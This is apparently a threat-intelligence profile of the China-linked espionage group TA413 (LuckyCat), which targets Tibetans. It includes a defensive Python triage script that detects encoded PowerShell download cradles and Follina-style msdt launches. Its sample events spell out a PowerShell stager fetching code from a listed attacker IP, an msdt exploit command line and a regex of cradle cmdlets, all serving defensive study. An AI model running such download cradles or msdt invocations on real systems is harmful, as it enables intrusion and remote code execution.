Ta413

Threat Actor updated 5 months ago (2024-05-04T20:45:57.913Z)
TA413, also known as LuckyCat, is a threat actor suspected of conducting cyber espionage on behalf of the Chinese state. In the first half of 2022, TA413 targeted Tibetan individuals, organizations, and the exiled Tibetan government. During that period the group exploited a since-patched zero-day in the Sophos Firewall product (CVE-2022-1040), weaponized the "Follina" vulnerability (CVE-2022-30190) shortly after its discovery and publication, and deployed a custom backdoor named LOWZERO against Tibetan entities. The combination of a true zero-day and a freshly published vulnerability matches a broader pattern among Chinese cyber-espionage groups, which tend to adopt new public exploits within days of disclosure.

TA413 appears to draw on a capability-development pipeline shared across several Chinese state-sponsored groups. Three observations support this: its continued use of the Royal Road RTF weaponizer, its use of the same Sophos Firewall zero-day as other China-linked groups, and its access to shared malware families such as the TClient backdoor. A Tibetan-language lure delivered with a Royal Road document shows that this shared tooling is being pointed specifically at the Tibetan community.

On the infrastructure side, the IP address 134.122.129[.]102 was used for post-exploitation activity. At the time of that activity it hosted applestatic[.]com, a domain with historical hosting overlaps with the known TA413 domain newsindian[.]xyz. A second, separate group targeting the Tibetan community was identified in the same period, so TA413 is not the only actor pursuing these targets.

TA413's intrusion chains also executed Base64-encoded PowerShell commands to retrieve follow-on payloads, with LOWZERO delivered as the custom backdoor. LOWZERO marks a departure from the group's earlier reliance on well-known or open-source tooling.
Description last updated: 2024-04-11T22:56:37.567Z
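The description above mentions two detection-relevant behaviours: a Follina-style chain in which an Office process launches msdt.exe, and Base64-encoded PowerShell commands that download follow-on payloads. The triage script below is an added example, not code from the page or from any vendor report on TA413. It decodes the UTF-16LE Base64 that PowerShell's -EncodedCommand expects, flags common download-cradle cmdlets in the decoded text, flags msdt.exe spawned by an Office parent, and matches the infrastructure indicators listed on this page. The process-creation events and the stager script are constructed sample data; the URL path /stage is hypothetical.

```python
import base64
import re

# Indicators taken from the page text (defanged there as 134.122.129[.]102, etc.).
TA413_INDICATORS = ("134.122.129.102", "applestatic.com", "newsindian.xyz")

# Cmdlets and aliases commonly seen in PowerShell download cradles.
CRADLE_RE = re.compile(
    r"DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|Invoke-RestMethod|"
    r"\birm\b|Net\.WebClient|Start-BitsTransfer|Invoke-Expression|\biex\b",
    re.IGNORECASE,
)
# PowerShell accepts any unambiguous prefix of -EncodedCommand; -e, -en, -enc and -ec are the usual ones.
ENCODED_RE = re.compile(r"-(?:e|en|enc|encodedcommand|ec)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)
OFFICE_PARENTS = ("winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe")


def encode_powershell(script: str) -> str:
    """Encode a script the way -EncodedCommand expects: Base64 over UTF-16LE bytes."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(cmdline: str):
    """Return the decoded script if the command line carries an encoded command, else None."""
    match = ENCODED_RE.search(cmdline)
    if not match:
        return None
    try:
        return base64.b64decode(match.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None  # not valid -EncodedCommand material


def analyze_event(event: dict) -> list:
    """Return a list of finding tags for one process-creation event."""
    findings = []
    parent = event["parent"].rsplit("\\", 1)[-1].lower()
    image = event["image"].rsplit("\\", 1)[-1].lower()
    cmdline = event["cmdline"]

    # Follina-style abuse (CVE-2022-30190): Office document hands off to ms-msdt.
    if image == "msdt.exe" and parent in OFFICE_PARENTS:
        findings.append("office_spawned_msdt")

    decoded = decode_encoded_command(cmdline)
    text = cmdline
    if decoded is not None:
        findings.append("encoded_powershell")
        text = decoded
        if CRADLE_RE.search(decoded):
            findings.append("download_cradle")

    # Indicator match runs over the decoded script when there is one, else the raw command line.
    for ioc in TA413_INDICATORS:
        if ioc in text:
            findings.append("ioc:" + ioc)
    return findings


def triage(events: list) -> dict:
    """Map event index to its findings, keeping only events that produced at least one."""
    results = {}
    for index, event in enumerate(events):
        findings = analyze_event(event)
        if findings:
            results[index] = findings
    return results


# Constructed sample events (not from the page or any real incident).
STAGER_SCRIPT = "(New-Object Net.WebClient).DownloadString('http://134.122.129.102/stage')"
SAMPLE_EVENTS = [
    {"parent": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "image": r"C:\Windows\System32\msdt.exe",
     "cmdline": "msdt.exe ms-msdt:/id PCWDiagnostic /skip force"},
    {"parent": r"C:\Windows\System32\msdt.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -nop -w hidden -EncodedCommand " + encode_powershell(STAGER_SCRIPT)},
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -NoProfile -Command Get-Service"},
]

if __name__ == "__main__":
    for index, findings in triage(SAMPLE_EVENTS).items():
        print(index, findings)
```

The benign third event produces no findings, which is the point of decoding before matching: an indicator or cradle check run only on the raw command line would miss anything hidden behind -EncodedCommand.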
Possible Aliases / Cluster overlaps
Vendors track clusters and naming conventions differently, so the following overlapping names and profiles may also be relevant.

Luckycat (3 votes): Luckycat is a possible alias for Ta413. LuckyCat, also known as TA413, is a threat actor with a history of malicious cyber activities. This group has been consistently targeting Tibetan entities, including individuals, organizations, and the exiled Tibetan government. Its activities have been linked to the use of ExileRAT and LuckyCat And

Lowzero (2 votes): Lowzero is a possible alias for Ta413. Lowzero is a custom backdoor malware introduced by TA413, a deviation from their usual practice of using well-known or open-source tools. Throughout the first half of 2022, TA413 exploited various vulnerabilities, including a patched zero-day vulnerability in Sophos Firewall product (CVE-2022-1040),
Source Document References
Information about the Ta413 Threat Actor was read from the documents corpus below.